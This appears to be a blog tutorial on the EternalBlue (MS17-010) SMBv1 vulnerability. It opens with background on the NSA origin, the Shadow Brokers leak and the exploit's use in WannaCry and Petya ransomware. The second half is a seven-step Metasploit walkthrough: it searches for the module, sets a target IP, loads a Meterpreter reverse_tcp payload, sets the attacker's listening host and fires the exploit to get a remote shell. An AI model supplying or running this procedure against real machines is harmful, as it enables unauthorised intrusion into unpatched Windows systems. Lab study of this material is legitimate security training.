EternalBlue is both the given name to a series of Microsoft software vulnerabilities and the exploit created by the NSA as a cyberattack tool. Although the EternalBlue exploit , officially named MS17-010 by Microsoft, affects only Windows operating systems, anything that uses the SMBv1 (Server Message Block version 1) file-sharing protocol is technically at risk of being targeted for ransomware and other cyberattacks.
The origins of the SMB vulnerability are what spy stories are made of — dangerous NSA hacking tools leaked, a notorious group called Shadow Brokers on the hunt for common vulnerabilities and exposures, and a massively popular operating system used by individuals, governments, and corporations worldwide.
According to statements made by Microsoft, EternalBlue was developed by the United State’s National Security Agency as part of their controversial program of stockpiling and weaponizing cybersecurity vulnerabilities, rather than flagging them to the appropriate vendor.
The NSA allegedly spent almost a year hunting for a bug in Microsoft’s software. Once they found it, the NSA developed EternalBlue to exploit the vulnerability. The NSA used EternalBlue for five years before alerting Microsoft of its existence. Microsoft has since called upon the NSA and other government bodies to support a Digital Geneva Convention, which calls for an end to nation-state stockpiling of software vulnerabilities.
EternalBlue used in cyberattacks
EternalBlue has been famously used to spread WannaCry and Petya ransomware. But the exploit can be used to deploy any type of cyberattack, including cryptojacking and worm-like malware. The NSA hack opened the door for any attacker to send a malicious packet to a vulnerable server that has not applied the patch to fix CVE-2017-0144.
STEP 1:The first thing we need to do is open up Kali and type #msfconsole terminal and start Metasploit.
msf 5>search eternalblue
STEP 2:Next, use the search command within Metasploit to locate a suitable module to use.There is an auxiliary scanner that we can run to determine if a target is vulnerable to MS17-010. It’s always a good idea to perform the necessary recon like this.
STEP 3: Run the module and with the Options command.
STEP 4: Now we need to specify the IP address of the target.
set RHOSTS 192.168.255.130 (Target IP)
STEP 5: Next, we can load the reverse_tcp shell as the payload.
Set payload windows/x64/meterpreter/reverse_tcp.
STEP 6:Finally, set the listening host to the IP address of our local machine.
Set LHOST 192.168.255.141 (Your IP )
STEP 7: Now the only thing left to do is launch the exploit. Use the run command to fire it off.